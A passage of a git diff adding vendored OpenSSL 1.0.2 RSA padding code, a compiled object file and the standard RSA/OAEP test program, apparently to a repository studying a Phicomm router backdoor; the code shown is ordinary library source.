+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+
+int RSA_padding_add_SSLv23(unsigned char *to, int tlen,
+                           const unsigned char *from, int flen)
+{
+    int i, j;
+    unsigned char *p;
+
+    if (flen > (tlen - 11)) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_SSLV23,
+               RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return (0);
+    }
+
+    p = (unsigned char *)to;
+
+    *(p++) = 0;
+    *(p++) = 2;                 /* Public Key BT (Block Type) */
+
+    /* pad out with non-zero random data */
+    j = tlen - 3 - 8 - flen;
+
+    if (RAND_bytes(p, j) <= 0)
+        return (0);
+    for (i = 0; i < j; i++) {
+        if (*p == '\0')
+            do {
+                if (RAND_bytes(p, 1) <= 0)
+                    return (0);
+            } while (*p == '\0');
+        p++;
+    }
+
+    memset(p, 3, 8);
+    p += 8;
+    *(p++) = '\0';
+
+    memcpy(p, from, (unsigned int)flen);
+    return (1);
+}
+
+int RSA_padding_check_SSLv23(unsigned char *to, int tlen,
+                             const unsigned char *from, int flen, int num)
+{
+    int i, j, k;
+    const unsigned char *p;
+
+    p = from;
+    if (flen < 10) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_SSLV23, RSA_R_DATA_TOO_SMALL);
+        return (-1);
+    }
+    if ((num != (flen + 1)) || (*(p++) != 02)) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_SSLV23, RSA_R_BLOCK_TYPE_IS_NOT_02);
+        return (-1);
+    }
+
+    /* scan over padding data */
+    j = flen - 1;               /* one for type */
+    for (i = 0; i < j; i++)
+        if (*(p++) == 0)
+            break;
+
+    if ((i == j) || (i < 8)) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_SSLV23,
+               RSA_R_NULL_BEFORE_BLOCK_MISSING);
+        return (-1);
+    }
+    for (k = -9; k < -1; k++) {
+        if (p[k] != 0x03)
+            break;
+    }
+    if (k == -1) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_SSLV23, RSA_R_SSLV3_ROLLBACK_ATTACK);
+        return (-1);
+    }
+
+    i++;                        /* Skip over the '\0' */
+    j -= i;
+    if (j > tlen) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_SSLV23, RSA_R_DATA_TOO_LARGE);
+        return (-1);
+    }
+    memcpy(to, p, (unsigned int)j);
+
+    return (j);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ssl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ssl.o
new file mode 100644
index 0000000000000000000000000000000000000000..3d183e4f8698c399de7ab7a4042e8a7b89ad8456
GIT binary patch
literal 2144
zcmbVLO>7%Q6n?hTCZT3)3PMFeXvF~%pewsYq7DdUoY>hSt3P&v5H#J|&bEQXKkTki
zgOFp%0%;|TIB@3F8yt|hR2+iSNNFO0;DXd!Zxs-P8U;0^LR#M2ooP0!&81J8d2haX
z-<vn@%`9c}xo9K;LL%@c?5zX}ARpSZ$6Rv^9)~z=AARmYH+P@C&8FGZbTPfYG?Y#C
zQX4<i&}o^bANz3nohX|xG5en@xB4NfcD3jk`#0A4>xgRKv475{?z54fChWVe->1DL
zIn~?DEmI=6&%xGa`*pDXRGn4ktYy=8Ke@LyJ^*TGb<qAJZ~v{{h;dQv@g1byAo}+8
z_h#5dHp4EhQmX7iXLoQZ?xk3#oaVbMGLh~zpX@Rxwb35Mymsv!wQEGIW1ibQxlK4L
z>Gjs2>a4X}4m7vYD^^^+b#upYoX&2)i1;D7KGS~V=~(kc)w!v59yrY{FN%p<%LYz+
z_2{fSn?ugZ$a?zU7Eh^40dCtXdHa{`>+i0@<oNigJUm@))~u$SR!%9&6RFpl?lRRn
znN*Umj(9NgT%lqoa8SD@&rU-Wphs8?2gy^Og2=}Oh+IoVhT{DLUt*z7BmOMk`-b!x
zDe*-#BOUL?GLrmxACrbZJH(`9=Wz5ZX_!eeZe^rIMj8M(j_&Vp?)Ri~QX={-?HnxB
zn?Bfb!aQQ3FOcpaZn2*g!$@HggTrAkM(IBQ4^KJfR&zh)2riHL@^ov4*z-83{z0Mo
zhT*vb@C%4jd=b~JD+M*ol4hC<N(Bl<rZq~lv+vigYN)hgG5^uYQ=m=e&t+I%JD1B9
zvs2m>%jB~fWD5nY(X=$(FzN;r*x3oKylCm>z9^MBy)rN2&|v_>o^mTpcm59_Jjr<<
z9{1t;0r+WZI0|*jA4et-1>dPV+yzb-xgl^-2T;t#s#PkZwhT|t3CqwIN{Xdlvp|_G
zStU@)rU^==Uajgi#A<a*SMX1qFs)K$p0BUgno7f{H*~{V1jUV@&uLeTQdQhUWb|lS
zMjBl`_!7quBe}%u;;lSiVUr%hK{Xr0;TM@d`O6%93^j!kFPQ!$$qP6L5B{951Lu-2
zNf3SoF^c)9{1lIwMC})G{>y$4ZE?QPqdv^<x*;6=V2JNqh|zDScjT8}IbZgJXp8y@
zxQqt52Ko0mzabpC4)SLZ59?o>_fOP?`bS*B7yS!6n~u876FSfHpg%Pj!Y3@)JA~jn
a4t_ujpYU)Gktfg!<@5X(9(sC4kpDlM(JPYx

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_test.c
new file mode 100644
index 0000000..e971295
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_test.c
@@ -0,0 +1,331 @@
+/* test vectors from p1ovect1.txt */
+
+#include <stdio.h>
+#include <string.h>
+
+#include "e_os.h"
+
+#include <openssl/crypto.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+#include <openssl/bn.h>
+#ifdef OPENSSL_NO_RSA
+int main(int argc, char *argv[])
+{
+    printf("No RSA support\n");
+    return (0);
+}
+#else
+# include <openssl/rsa.h>
+
+# define SetKey \
+  key->n = BN_bin2bn(n, sizeof(n)-1, key->n); \
+  key->e = BN_bin2bn(e, sizeof(e)-1, key->e); \
+  key->d = BN_bin2bn(d, sizeof(d)-1, key->d); \
+  key->p = BN_bin2bn(p, sizeof(p)-1, key->p); \
+  key->q = BN_bin2bn(q, sizeof(q)-1, key->q); \
+  key->dmp1 = BN_bin2bn(dmp1, sizeof(dmp1)-1, key->dmp1); \
+  key->dmq1 = BN_bin2bn(dmq1, sizeof(dmq1)-1, key->dmq1); \
+  key->iqmp = BN_bin2bn(iqmp, sizeof(iqmp)-1, key->iqmp); \
+  memcpy(c, ctext_ex, sizeof(ctext_ex) - 1); \
+  return (sizeof(ctext_ex) - 1);
+
+static int key1(RSA *key, unsigned char *c)
+{
+    static unsigned char n[] =
+        "\x00\xAA\x36\xAB\xCE\x88\xAC\xFD\xFF\x55\x52\x3C\x7F\xC4\x52\x3F"
+        "\x90\xEF\xA0\x0D\xF3\x77\x4A\x25\x9F\x2E\x62\xB4\xC5\xD9\x9C\xB5"
+        "\xAD\xB3\x00\xA0\x28\x5E\x53\x01\x93\x0E\x0C\x70\xFB\x68\x76\x93"
+        "\x9C\xE6\x16\xCE\x62\x4A\x11\xE0\x08\x6D\x34\x1E\xBC\xAC\xA0\xA1"
+        "\xF5";
+
+    static unsigned char e[] = "\x11";
+
+    static unsigned char d[] =
+        "\x0A\x03\x37\x48\x62\x64\x87\x69\x5F\x5F\x30\xBC\x38\xB9\x8B\x44"
+        "\xC2\xCD\x2D\xFF\x43\x40\x98\xCD\x20\xD8\xA1\x38\xD0\x90\xBF\x64"
+        "\x79\x7C\x3F\xA7\xA2\xCD\xCB\x3C\xD1\xE0\xBD\xBA\x26\x54\xB4\xF9"
+        "\xDF\x8E\x8A\xE5\x9D\x73\x3D\x9F\x33\xB3\x01\x62\x4A\xFD\x1D\x51";
+
+    static unsigned char p[] =
+        "\x00\xD8\x40\xB4\x16\x66\xB4\x2E\x92\xEA\x0D\xA3\xB4\x32\x04\xB5"
+        "\xCF\xCE\x33\x52\x52\x4D\x04\x16\xA5\xA4\x41\xE7\x00\xAF\x46\x12"
+        "\x0D";
+
+    static unsigned char q[] =
+        "\x00\xC9\x7F\xB1\xF0\x27\xF4\x53\xF6\x34\x12\x33\xEA\xAA\xD1\xD9"
+        "\x35\x3F\x6C\x42\xD0\x88\x66\xB1\xD0\x5A\x0F\x20\x35\x02\x8B\x9D"
+        "\x89";
+
+    static unsigned char dmp1[] =
+        "\x59\x0B\x95\x72\xA2\xC2\xA9\xC4\x06\x05\x9D\xC2\xAB\x2F\x1D\xAF"
+        "\xEB\x7E\x8B\x4F\x10\xA7\x54\x9E\x8E\xED\xF5\xB4\xFC\xE0\x9E\x05";
+
+    static unsigned char dmq1[] =
+        "\x00\x8E\x3C\x05\x21\xFE\x15\xE0\xEA\x06\xA3\x6F\xF0\xF1\x0C\x99"
+        "\x52\xC3\x5B\x7A\x75\x14\xFD\x32\x38\xB8\x0A\xAD\x52\x98\x62\x8D"
+        "\x51";
+
+    static unsigned char iqmp[] =
+        "\x36\x3F\xF7\x18\x9D\xA8\xE9\x0B\x1D\x34\x1F\x71\xD0\x9B\x76\xA8"
+        "\xA9\x43\xE1\x1D\x10\xB2\x4D\x24\x9F\x2D\xEA\xFE\xF8\x0C\x18\x26";
+
+    static unsigned char ctext_ex[] =
+        "\x1b\x8f\x05\xf9\xca\x1a\x79\x52\x6e\x53\xf3\xcc\x51\x4f\xdb\x89"
+        "\x2b\xfb\x91\x93\x23\x1e\x78\xb9\x92\xe6\x8d\x50\xa4\x80\xcb\x52"
+        "\x33\x89\x5c\x74\x95\x8d\x5d\x02\xab\x8c\x0f\xd0\x40\xeb\x58\x44"
+        "\xb0\x05\xc3\x9e\xd8\x27\x4a\x9d\xbf\xa8\x06\x71\x40\x94\x39\xd2";
+
+    SetKey;
+}
+
+static int key2(RSA *key, unsigned char *c)
+{
+    static unsigned char n[] =
+        "\x00\xA3\x07\x9A\x90\xDF\x0D\xFD\x72\xAC\x09\x0C\xCC\x2A\x78\xB8"
+        "\x74\x13\x13\x3E\x40\x75\x9C\x98\xFA\xF8\x20\x4F\x35\x8A\x0B\x26"
+        "\x3C\x67\x70\xE7\x83\xA9\x3B\x69\x71\xB7\x37\x79\xD2\x71\x7B\xE8"
+        "\x34\x77\xCF";
+
+    static unsigned char e[] = "\x3";
+
+    static unsigned char d[] =
+        "\x6C\xAF\xBC\x60\x94\xB3\xFE\x4C\x72\xB0\xB3\x32\xC6\xFB\x25\xA2"
+        "\xB7\x62\x29\x80\x4E\x68\x65\xFC\xA4\x5A\x74\xDF\x0F\x8F\xB8\x41"
+        "\x3B\x52\xC0\xD0\xE5\x3D\x9B\x59\x0F\xF1\x9B\xE7\x9F\x49\xDD\x21"
+        "\xE5\xEB";
+
+    static unsigned char p[] =
+        "\x00\xCF\x20\x35\x02\x8B\x9D\x86\x98\x40\xB4\x16\x66\xB4\x2E\x92"
+        "\xEA\x0D\xA3\xB4\x32\x04\xB5\xCF\xCE\x91";
+
+    static unsigned char q[] =
+        "\x00\xC9\x7F\xB1\xF0\x27\xF4\x53\xF6\x34\x12\x33\xEA\xAA\xD1\xD9"
+        "\x35\x3F\x6C\x42\xD0\x88\x66\xB1\xD0\x5F";
+
+    static unsigned char dmp1[] =
+        "\x00\x8A\x15\x78\xAC\x5D\x13\xAF\x10\x2B\x22\xB9\x99\xCD\x74\x61"
+        "\xF1\x5E\x6D\x22\xCC\x03\x23\xDF\xDF\x0B";
+
+    static unsigned char dmq1[] =
+        "\x00\x86\x55\x21\x4A\xC5\x4D\x8D\x4E\xCD\x61\x77\xF1\xC7\x36\x90"
+        "\xCE\x2A\x48\x2C\x8B\x05\x99\xCB\xE0\x3F";
+
+    static unsigned char iqmp[] =
+        "\x00\x83\xEF\xEF\xB8\xA9\xA4\x0D\x1D\xB6\xED\x98\xAD\x84\xED\x13"
+        "\x35\xDC\xC1\x08\xF3\x22\xD0\x57\xCF\x8D";
+
+    static unsigned char ctext_ex[] =
+        "\x14\xbd\xdd\x28\xc9\x83\x35\x19\x23\x80\xe8\xe5\x49\xb1\x58\x2a"
+        "\x8b\x40\xb4\x48\x6d\x03\xa6\xa5\x31\x1f\x1f\xd5\xf0\xa1\x80\xe4"
+        "\x17\x53\x03\x29\xa9\x34\x90\x74\xb1\x52\x13\x54\x29\x08\x24\x52"
+        "\x62\x51";
+
+    SetKey;
+}
+
+static int key3(RSA *key, unsigned char *c)
+{
+    static unsigned char n[] =
+        "\x00\xBB\xF8\x2F\x09\x06\x82\xCE\x9C\x23\x38\xAC\x2B\x9D\xA8\x71"
+        "\xF7\x36\x8D\x07\xEE\xD4\x10\x43\xA4\x40\xD6\xB6\xF0\x74\x54\xF5"
+        "\x1F\xB8\xDF\xBA\xAF\x03\x5C\x02\xAB\x61\xEA\x48\xCE\xEB\x6F\xCD"
+        "\x48\x76\xED\x52\x0D\x60\xE1\xEC\x46\x19\x71\x9D\x8A\x5B\x8B\x80"
+        "\x7F\xAF\xB8\xE0\xA3\xDF\xC7\x37\x72\x3E\xE6\xB4\xB7\xD9\x3A\x25"
+        "\x84\xEE\x6A\x64\x9D\x06\x09\x53\x74\x88\x34\xB2\x45\x45\x98\x39"
+        "\x4E\xE0\xAA\xB1\x2D\x7B\x61\xA5\x1F\x52\x7A\x9A\x41\xF6\xC1\x68"
+        "\x7F\xE2\x53\x72\x98\xCA\x2A\x8F\x59\x46\xF8\xE5\xFD\x09\x1D\xBD"
+        "\xCB";
+
+    static unsigned char e[] = "\x11";
+
+    static unsigned char d[] =
+        "\x00\xA5\xDA\xFC\x53\x41\xFA\xF2\x89\xC4\xB9\x88\xDB\x30\xC1\xCD"
+        "\xF8\x3F\x31\x25\x1E\x06\x68\xB4\x27\x84\x81\x38\x01\x57\x96\x41"
+        "\xB2\x94\x10\xB3\xC7\x99\x8D\x6B\xC4\x65\x74\x5E\x5C\x39\x26\x69"
+        "\xD6\x87\x0D\xA2\xC0\x82\xA9\x39\xE3\x7F\xDC\xB8\x2E\xC9\x3E\xDA"
+        "\xC9\x7F\xF3\xAD\x59\x50\xAC\xCF\xBC\x11\x1C\x76\xF1\xA9\x52\x94"
+        "\x44\xE5\x6A\xAF\x68\xC5\x6C\x09\x2C\xD3\x8D\xC3\xBE\xF5\xD2\x0A"
+        "\x93\x99\x26\xED\x4F\x74\xA1\x3E\xDD\xFB\xE1\xA1\xCE\xCC\x48\x94"
+        "\xAF\x94\x28\xC2\xB7\xB8\x88\x3F\xE4\x46\x3A\x4B\xC8\x5B\x1C\xB3"
+        "\xC1";
+
+    static unsigned char p[] =
+        "\x00\xEE\xCF\xAE\x81\xB1\xB9\xB3\xC9\x08\x81\x0B\x10\xA1\xB5\x60"
+        "\x01\x99\xEB\x9F\x44\xAE\xF4\xFD\xA4\x93\xB8\x1A\x9E\x3D\x84\xF6"
+        "\x32\x12\x4E\xF0\x23\x6E\x5D\x1E\x3B\x7E\x28\xFA\xE7\xAA\x04\x0A"
+        "\x2D\x5B\x25\x21\x76\x45\x9D\x1F\x39\x75\x41\xBA\x2A\x58\xFB\x65"
+        "\x99";
+
+    static unsigned char q[] =
+        "\x00\xC9\x7F\xB1\xF0\x27\xF4\x53\xF6\x34\x12\x33\xEA\xAA\xD1\xD9"
+        "\x35\x3F\x6C\x42\xD0\x88\x66\xB1\xD0\x5A\x0F\x20\x35\x02\x8B\x9D"
+        "\x86\x98\x40\xB4\x16\x66\xB4\x2E\x92\xEA\x0D\xA3\xB4\x32\x04\xB5"
+        "\xCF\xCE\x33\x52\x52\x4D\x04\x16\xA5\xA4\x41\xE7\x00\xAF\x46\x15"
+        "\x03";
+
+    static unsigned char dmp1[] =
+        "\x54\x49\x4C\xA6\x3E\xBA\x03\x37\xE4\xE2\x40\x23\xFC\xD6\x9A\x5A"
+        "\xEB\x07\xDD\xDC\x01\x83\xA4\xD0\xAC\x9B\x54\xB0\x51\xF2\xB1\x3E"
+        "\xD9\x49\x09\x75\xEA\xB7\x74\x14\xFF\x59\xC1\xF7\x69\x2E\x9A\x2E"
+        "\x20\x2B\x38\xFC\x91\x0A\x47\x41\x74\xAD\xC9\x3C\x1F\x67\xC9\x81";
+
+    static unsigned char dmq1[] =
+        "\x47\x1E\x02\x90\xFF\x0A\xF0\x75\x03\x51\xB7\xF8\x78\x86\x4C\xA9"
+        "\x61\xAD\xBD\x3A\x8A\x7E\x99\x1C\x5C\x05\x56\xA9\x4C\x31\x46\xA7"
+        "\xF9\x80\x3F\x8F\x6F\x8A\xE3\x42\xE9\x31\xFD\x8A\xE4\x7A\x22\x0D"
+        "\x1B\x99\xA4\x95\x84\x98\x07\xFE\x39\xF9\x24\x5A\x98\x36\xDA\x3D";
+
+    static unsigned char iqmp[] =
+        "\x00\xB0\x6C\x4F\xDA\xBB\x63\x01\x19\x8D\x26\x5B\xDB\xAE\x94\x23"
+        "\xB3\x80\xF2\x71\xF7\x34\x53\x88\x50\x93\x07\x7F\xCD\x39\xE2\x11"
+        "\x9F\xC9\x86\x32\x15\x4F\x58\x83\xB1\x67\xA9\x67\xBF\x40\x2B\x4E"
+        "\x9E\x2E\x0F\x96\x56\xE6\x98\xEA\x36\x66\xED\xFB\x25\x79\x80\x39"
+        "\xF7";
+
+    static unsigned char ctext_ex[] =
+        "\xb8\x24\x6b\x56\xa6\xed\x58\x81\xae\xb5\x85\xd9\xa2\x5b\x2a\xd7"
+        "\x90\xc4\x17\xe0\x80\x68\x1b\xf1\xac\x2b\xc3\xde\xb6\x9d\x8b\xce"
+        "\xf0\xc4\x36\x6f\xec\x40\x0a\xf0\x52\xa7\x2e\x9b\x0e\xff\xb5\xb3"
+        "\xf2\xf1\x92\xdb\xea\xca\x03\xc1\x27\x40\x05\x71\x13\xbf\x1f\x06"
+        "\x69\xac\x22\xe9\xf3\xa7\x85\x2e\x3c\x15\xd9\x13\xca\xb0\xb8\x86"
+        "\x3a\x95\xc9\x92\x94\xce\x86\x74\x21\x49\x54\x61\x03\x46\xf4\xd4"
+        "\x74\xb2\x6f\x7c\x48\xb4\x2e\xe6\x8e\x1f\x57\x2a\x1f\xc4\x02\x6a"
+        "\xc4\x56\xb4\xf5\x9f\x7b\x62\x1e\xa1\xb9\xd8\x8f\x64\x20\x2f\xb1";
+
+    SetKey;
+}
+
+static int pad_unknown(void)
+{
+    unsigned long l;
+    while ((l = ERR_get_error()) != 0)
+        if (ERR_GET_REASON(l) == RSA_R_UNKNOWN_PADDING_TYPE)
+            return (1);
+    return (0);
+}
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+
+int main(int argc, char *argv[])
+{
+    int err = 0;
+    int v;
+    RSA *key;
+    unsigned char ptext[256];
+    unsigned char ctext[256];
+    static unsigned char ptext_ex[] = "\x54\x85\x9b\x34\x2c\x49\xea\x2a";
+    unsigned char ctext_ex[256];
+    int plen;
+    int clen = 0;
+    int num;
+    int n;
+
+    CRYPTO_malloc_debug_init();
+    CRYPTO_dbg_set_options(V_CRYPTO_MDEBUG_ALL);
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    RAND_seed(rnd_seed, sizeof rnd_seed); /* or OAEP may fail */
+
+    plen = sizeof(ptext_ex) - 1;
+
+    for (v = 0; v < 6; v++) {
+        key = RSA_new();
+        switch (v % 3) {
+        case 0:
+            clen = key1(key, ctext_ex);
+            break;
+        case 1:
+            clen = key2(key, ctext_ex);
+            break;
+        case 2:
+            clen = key3(key, ctext_ex);
+            break;
+        }
+        if (v / 3 >= 1)
+            key->flags |= RSA_FLAG_NO_CONSTTIME;
+
+        num = RSA_public_encrypt(plen, ptext_ex, ctext, key,
+                                 RSA_PKCS1_PADDING);
+        if (num != clen) {
+            printf("PKCS#1 v1.5 encryption failed!\n");
+            err = 1;
+            goto oaep;
+        }
+
+        num = RSA_private_decrypt(num, ctext, ptext, key, RSA_PKCS1_PADDING);
+        if (num != plen || memcmp(ptext, ptext_ex, num) != 0) {
+            printf("PKCS#1 v1.5 decryption failed!\n");
+            err = 1;
+        } else
+            printf("PKCS #1 v1.5 encryption/decryption ok\n");
+
+ oaep:
+        ERR_clear_error();
+        num = RSA_public_encrypt(plen, ptext_ex, ctext, key,
+                                 RSA_PKCS1_OAEP_PADDING);
+        if (num == -1 && pad_unknown()) {
+            printf("No OAEP support\n");
+            goto next;
+        }
+        if (num != clen) {
+            printf("OAEP encryption failed!\n");
+            err = 1;
+            goto next;
+        }
+
+        num = RSA_private_decrypt(num, ctext, ptext, key,
+                                  RSA_PKCS1_OAEP_PADDING);
+        if (num != plen || memcmp(ptext, ptext_ex, num) != 0) {
+            printf("OAEP decryption (encrypted data) failed!\n");
+            err = 1;
+        } else if (memcmp(ctext, ctext_ex, num) == 0)
+            printf("OAEP test vector %d passed!\n", v);
+
+        /*
+         * Different ciphertexts (rsa_oaep.c without -DPKCS_TESTVECT). Try
+         * decrypting ctext_ex
+         */
+
+        num = RSA_private_decrypt(clen, ctext_ex, ptext, key,
+                                  RSA_PKCS1_OAEP_PADDING);
+
+        if (num != plen || memcmp(ptext, ptext_ex, num) != 0) {
+            printf("OAEP decryption (test vector data) failed!\n");
+            err = 1;
+        } else
+            printf("OAEP encryption/decryption ok\n");
+
+        /* Try decrypting corrupted ciphertexts */
+        for (n = 0; n < clen; ++n) {
+            int b;
+            unsigned char saved = ctext[n];
+            for (b = 0; b < 256; ++b) {
+                if (b == saved)
+                    continue;
+                ctext[n] = b;
+                num = RSA_private_decrypt(num, ctext, ptext, key,
+                                          RSA_PKCS1_OAEP_PADDING);
+                if (num > 0) {
+                    printf("Corrupt data decrypted!\n");
+                    err = 1;
+                }
+            }
+        }
+ next:
+        RSA_free(key);
+    }
+
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+
+    CRYPTO_mem_leaks_fp(stderr);
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    return err;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_x931.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_x931.c
new file mode 100644
index 0000000..725ead0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_x931.c
@@ -0,0 +1,167 @@
+/* rsa_x931.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+
+int RSA_padding_add_X931(unsigned char *to, int tlen,
+                         const unsigned char *from, int flen)
+{
+    int j;
+    unsigned char *p;
+
+    /*
+     * Absolute minimum amount of padding is 1 header nibble, 1 padding
+     * nibble and 2 trailer bytes: but 1 hash if is already in 'from'.
+     */
+
+    j = tlen - flen - 2;
+
+    if (j < 0) {
+        RSAerr(RSA_F_RSA_PADDING_ADD_X931, RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE);
+        return -1;
+    }
+
+    p = (unsigned char *)to;
+
+    /* If no padding start and end nibbles are in one byte */
+    if (j == 0)
+        *p++ = 0x6A;
+    else {
+        *p++ = 0x6B;
+        if (j > 1) {
+            memset(p, 0xBB, j - 1);
+            p += j - 1;
+        }
+        *p++ = 0xBA;
+    }
+    memcpy(p, from, (unsigned int)flen);
+    p += flen;
+    *p = 0xCC;
+    return (1);
+}
+
+int RSA_padding_check_X931(unsigned char *to, int tlen,
+                           const unsigned char *from, int flen, int num)
+{
+    int i = 0, j;
+    const unsigned char *p;
+
+    p = from;
+    if ((num != flen) || ((*p != 0x6A) && (*p != 0x6B))) {
+        RSAerr(RSA_F_RSA_PADDING_CHECK_X931, RSA_R_INVALID_HEADER);
+        return -1;
+    }
+
+    if (*p++ == 0x6B) {
+        j = flen - 3;
+        for (i = 0; i < j; i++) {
+            unsigned char c = *p++;
+            if (c == 0xBA)
+                break;
+            if (c != 0xBB) {
+                RSAerr(RSA_F_RSA_PADDING_CHECK_X931, RSA_R_INVALID_PADDING);
+                return -1;
+            }
+        }
+
+        j -= i;
+
+        if (i == 0) {
